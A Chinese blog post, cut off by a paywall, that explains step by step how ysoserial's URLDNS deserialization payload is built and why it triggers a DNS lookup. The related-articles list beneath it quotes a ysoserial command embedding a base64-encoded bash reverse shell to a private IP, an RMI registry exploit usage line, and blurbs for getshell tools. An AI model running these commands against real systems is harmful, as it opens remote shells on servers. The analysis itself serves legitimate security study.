Java反序列化之ysoserial URLDNS模块分析

最新推荐文章于 2024-04-10 00:29:44 发布
最新推荐文章于 2024-04-10 00:29:44 发布
阅读量1.1k 收藏 1
点赞数 2
分类专栏: 程序人生 架构 Java 文章标签: java 编程语言 python android 反射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_37903468/article/details/109812161
版权

前言

Java反序列化漏洞 利用时,总会使用到ysoserial这款工具,安服仔用了很多,但是工具的原理却依旧不清不楚,当了这么久的脚本仔,是时候当一波(实习)研究仔,学习下这款工具各个Payload的原理了,下面我们先从漏洞探测模块URLDNS这个Payload开始学起,逐步衍生到漏洞利用模块。

为什么URLDNS模块会发送DNSLOG请求?

分析

下载ysoserial项目,打开pom.xml,程序入口在 ysoserial.GeneratePayload

打开GeneratePayload.java,找到main方法,代码如下:

当我们使用ysoserial执行以下命令时:

java -jar .\ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://lyxhh.dnslog.cn"  > dnslog.ser

首先ysoserial获取外面传入的参数,并赋值给对应的变量。

inal String payloadType = args[0]; // URLDNS
final String command = args[1]; //http://lyxhh.dnslog.cn

接着执行 Utils.getPayloadClass("URLDNS"); ,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象。

final ObjectPayload payload = payloadClass.newInstance();

然后通过反射创建Class类对应的对象,走完这句代码,URLDNS对象创建完成。

final Object object = payload.getObject("http://lyxhh.dnslog.cn");

接着执行URLDNS对象中的getObject方法。

getObject方法中:

URLStreamHandler handler = new SilentURLStreamHandler();

创建了URLStreamHandler对象,该对象的作用,后面我们会详细说到。

接着:

HashMap ht = new HashMap();

创建了HashMap对象:

URL u = new URL(null, "http://lyxhh.dnslog.cn", handler);

URL对象:

ht.put(u, "http://lyxhh.dnslog.cn");

将URL对象作为HashMap中的key,dnslog地址为值,存入HashMap中。

Reflections.setFieldValue(u, "hashCode", -1);

通过反射机制 设置URL对象的成员变量hashCode值为-1,为什么要设置值为-1,这问题在反序列化时会详细说到。

将HashMap对象返回 return ht; ,接着对 HashMap对象 进行序列化操作 Serializer.serialize(object, out); 并将序列化的结果重定向到 dnslog.ser 文件中。

由于HashMap中重写了writeObject方法,因此在进行序列化操作时,执行的序列化方法是HashMap中的writeObject方法,具体如下:

先执行默认的序列化操作:

<
最低0.47元/天 解锁文章
烟雨平生V
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java反序列化终极测试工具
09-17
Java反序列化终极测试工具
Java反序列化终极测试工具.zip
04-10
Java反序列化终极测试工具(里面有两款)
109-Java反序列化ysoserial URLDNS模块分析.pdf
09-20
109-Java反序列化ysoserial URLDNS模块分析.pdf
Java反序列化ysoserial URLDNS模块分析,2024必看-Java高级面试题总结
2401_83946044的博客
04-04 309
按照上面的过程,4个月的时间刚刚好。当然Java的体系是很庞大的,还有很多更高级的技能需要掌握,但不要着急,这些完全可以放到以后工作中边用别学。学习编程就是一个由混沌到有序的过程,所以你在学习过程中,如果一时碰到理解不了的知识点,大可不必沮丧,更不要气馁,这都是正常的不能再正常的事情了,不过是“人同此心,心同此理”的暂时而已。道路是曲折的,前途是光明的!一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
Java反序列化ysoserial URLDNS模块分析,2024年最新大佬推荐
最新发布
2401_83620865的博客
04-10 745
如果你已经下定决心要转行做编程行业,在最开始的时候就要对自己的学习有一个基本的规划,还要对这个行业的技术需求有一个基本的了解。有一个已就业为目的的学习目标,然后为之努力,坚持到底。如果你有幸看到这篇文章,希望对你有所帮助,祝你转行成功。一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 870
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Java反序列化工具ysoserial使用
st3pby的博客
12-20 3264
ysoserial是一款用于生成 利用不安全的Java对象反序列化 的有效负载的概念验证工具。项目地址主要有两种使用方式,一种是运行ysoserial.jar 中的主类函数,另一种是运行ysoserial中的exploit 类,二者的效果是不一样的,一般用第二种方式开启交互服务。
fastjson 序列化 不包括转义字符_Java 反序列化工具 gadgetinspector 初窥 (上)
weixin_39899021的博客
11-20 290
作者:Longofo@知道创宇404实验室时间:2019年9月4日起因一开始是听@Badcode师傅说的这个工具,在Black Hat 2018的一个议题提出来的。这是一个基于字节码静态分析的、利用已知技巧自动查找从source到sink的反序列化利用链工具。看了几遍作者在Black Hat上的演讲视频[1]与PPT[2],想从作者的演讲与PPT中获取更多关于这个工具的原理性的东西,可是...
浅谈java反序列化工具ysoserial
09-11 2217
前言   关于java反序列化漏洞的原理分析,基本都是在分析使用Apache Commons Collections这个库,造成的反序列化问题。然而,在下载老外的ysoserial工具并仔细看看后,我发现了许多值得学习的知识。 至少能学到如下内容:   不同反序列化payload玩法灵活运用了反射机制和动态代理机制构造POC   java反序列化不仅是有Apache Comm...
java反序列化终极测试工具.zip
04-28
java反序列化终极工具,含有JBoss,websphere,weblogic等反序列化漏洞利用。
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
09-05
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java反序列化漏洞利用工具(WebLogic&Jboss)
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化入门之URLDNS链1
08-03
1、 java.util.HashMap 重写了 readObject 方法: 2、 java.net.URL 对象的 hashCode 在计算时会调用 get
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
深入分析Java的序列化与反序列化
12-22
本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io.Serializable接口才能被序列化  transient的作用是什么  怎么自定义序列...
java反序列化攻击
10-05
Java反序列化攻击是一种安全漏洞,攻击者可以通过操纵反序列化过程中的输入数据,来执行未授权的操作。攻击者可以通过修改被序列化的对象的内容,或者创建恶意的序列化数据,来导致代码执行、远程命令执行、上传恶意脚本等危害。这个漏洞主要是因为Java中的反序列化机制存在安全问题,攻击者可以利用这个机制来绕过授权和验证机制。 Java反序列化攻击的原理是,当Java应用程序接收到一个包含被序列化对象的数据流时,它会尝试将该数据流反序列化为对象。在这个过程中,Java会调用被反序列化对象的readObject()方法,来恢复对象的状态。攻击者可以通过修改被反序列化对象的数据,来执行任意的代码。 为了防止Java反序列化攻击,可以采取以下措施: 1. 不要在不受信任的数据源中反序列化对象。只从可信任的源获取反序列化数据。 2. 对反序列化的数据进行验证和授权,确保反序列化的对象符合预期的结构和内容。 3. 对反序列化的类进行限制,只反序列化必要的类,并设置安全管理器,控制对象的访问权限。 4. 更新和升级应用程序的Java版本,以修复已知的反序列化漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值